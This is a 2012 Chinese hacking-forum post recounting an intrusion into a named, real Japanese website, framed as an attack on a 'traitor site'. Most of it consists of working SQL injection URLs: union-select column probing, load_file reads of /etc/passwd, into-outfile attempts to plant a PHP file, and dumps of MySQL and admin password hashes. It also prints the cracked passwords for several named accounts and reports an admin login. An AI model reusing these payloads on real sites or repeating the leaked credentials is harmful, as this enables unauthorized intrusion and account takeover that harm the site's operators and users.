找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3449|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
+ }1 ?* Z. X5 {  D+ I

* V: T, G" s, r% t0x01. 检测 www.zuaa.jp 收集数据5 R6 u4 I; |" J$ F0 P  L

6 o4 s# u  o7 ~  w, G0 L7 W* q: W! E" d2 x; G
whatweb
5 a, j( _( ?, G* n0 P
, T1 K1 F' ^% m$ U. @. l; ^8 ]7 z* w* [& i
利用NMAP扫描  W' k( K: C+ ?' w6 M
; K7 t2 J4 q/ o7 r
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& Y/ E: n# B- D7 |6 K7 A/ F
0x02.找注入点7 }: x! F, M' K$ z  `
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390* c7 A5 n4 f/ M

7 v' T1 o- j8 [. r' O" o" m0 ~! k/ z3 y$ m) \+ I$ Z
0x03.order by' S% g: r5 k( i+ X5 G
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 17 c" }4 H3 _' M
1 S  }, ?- Q  F! J( _, t5 B
order by 28报错,order by 27正常
  t7 J, h7 e2 c5 ]& x% f9 E$ ?' m( |6 V4 D* r& I! y
0x04.   union手动查询
4 L0 ]/ E, r6 A9 ?+ ^5 a8 Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
& U% i8 Y8 x5 h! m8 H添加到 27 时正常显示
6 u& h) b' z$ g9 j& D6 I6 f; i( X4 Y' T
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" B& T- h8 i2 P8 u4 C& i4 _$ |
' {: I% w1 o1 `! L$ v- o0x05. info:
: B1 t) I& a; ~, K& H9 @+ Ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 x& ?) E7 ^8 ~5 {3 a9 W7 N2 `: ^% L9 N1 D
user:            root@localhost
5 Y2 d' ?" T, P1 Jdatabase:    openpne
1 \. x, p% ?; ?; L$ n. A; iversion:      4.1.22
9 R0 x4 X" _* l9 [os:             portbld-freebsd5.4
* H$ i. N; Q9 c7 D6 o8 C3 k, X' s7 m* J- V6 C2 f% r, T0 ^% i) \
0x06. root用户4 |: j$ Z2 X  j0 U
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)- x: ]# ]( p9 B6 T) w) k
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 7 {& @* a0 x$ ?, z* S5 o$ T
: B8 G6 a; U' b' w$ }0 E8 T8 _
通过工具转换
: I) u$ V; i- \0 U3 p
4 }4 N% ?' C- s# F( J中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ @4 c3 ]: H. {2 U- Q* E4 [6 [4 q) ~2 G9 g9 j
0x07. 利用 into outfile: `) W, i% `* s8 L2 \7 E* o( E/ U
全部都失败
) X5 I  n7 y  u/ Z- ~1 y% @6 zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php) g5 g* T$ y4 u5 q
& l5 t, E  Z) H+ ?1 k* t
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php & H  Y, t5 @( M+ G/ J
" S! Z, g( t0 f: P6 T# G* v
页面显示“MDB2 Error:syntax error”
8 J3 s, \0 [* u6 v3 s+ s; c7 t+ u! E
0x08. 利用 mysql 4.1
8 [- @4 s0 _. O5 d. o猜常规表名,字段未果 工具 sqlmap
& d/ z6 k0 j1 X' O9 `中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 Y1 m' ]8 v; L" j, _8 ^1 j8 z

4 e- a$ k6 O& h0 n+ B. Y
# O1 L0 |, I. N& s/ H
( ^1 B5 y3 t) j) @0x09. 查找后台) X9 A% M6 ?0 }# d+ r
利用 现有的各种 后台工具尝试都不行
+ N8 L/ _7 \6 c: I9 l2 ~% z* Q( D4 }% g$ H! C, o
0x10.  MySL外联方法
/ G) T8 j7 I/ V, H; u/ n从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
8 k5 Z  B& f$ O可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user) _7 E3 r6 c& U, K( N
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
, h+ R# H. k" ^- p- P4 N, K8 w, i8 X8 p1 l' H' o6 c6 Z4 U" b
这个可以在 www.cmd5.com 解密: `2 I. v9 C7 p) M+ ?1 G/ E; s: t
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20090 v  g" U4 o3 o! O
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
4 I" T9 a" w$ S! \1 D- E. r8 D# iopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???. ]7 `( W! x  _) d
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! Y9 Z2 q$ S; s- v4 V工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知: V% m) ]! K2 p  [1 b% M

+ K$ O4 H' g/ s7 n0 Q( M+ ^+ z  R, X" `/ `
0x11. 网站突破% c) w: g) f( A1 O' M% X6 A
发现网站的源程序 openpne, google 下载 openpne 源码
/ n6 R* F% |+ B% d- c7 V  V5 X: _# |/ p) [+ J! n

' c8 O, e; S# S' `* s2 ]7 F( W. Q0x12. 默认信息利用
. V( H" T* E+ [$ A% ]) ^% }http://sns.zuaa.jp/?m=admin&a=page_login
6 ^9 a8 q/ q; M. M$ [/ N7 ~; s* j/ V  [; x
表名 (c_admin_user) ,字段名(username,password)
- j3 l0 V1 |# h8 s" shttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
% }0 o1 B9 A' y1 A9 r* l* h2 ~- J7 i
解密
5 S0 c/ h$ K- s5 L& Uzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20092 g: ?" [+ z) D. x, h
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
8 |/ {5 M6 o4 J! K( ]! z
! D, M& ~8 X/ m3 g9 N# B( k( a中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持: I8 Q% e5 g4 F1 B& f% b

) z# Z# L' B! m% y0x13. 登录后台% k6 L0 z: ~7 b* j! y6 r% x
+ O. b& ?$ e& L9 O; M
/ J+ u9 y. a4 l7 l: ~6 U
) c8 g% K+ t: L
0x14. 小结1 m& ^; x- Y. m* h
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
4 H0 Q, O/ U, l9 F6 B4 l8 ]感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点# Q+ V" ]; O7 U: r
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain# l3 H; M( G& \3 D5 B
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; A* D6 Y( i( d& R. U
/ x% H+ g. e; x0 S' s8 {
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
" C( A7 l2 `# d: f6 n

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表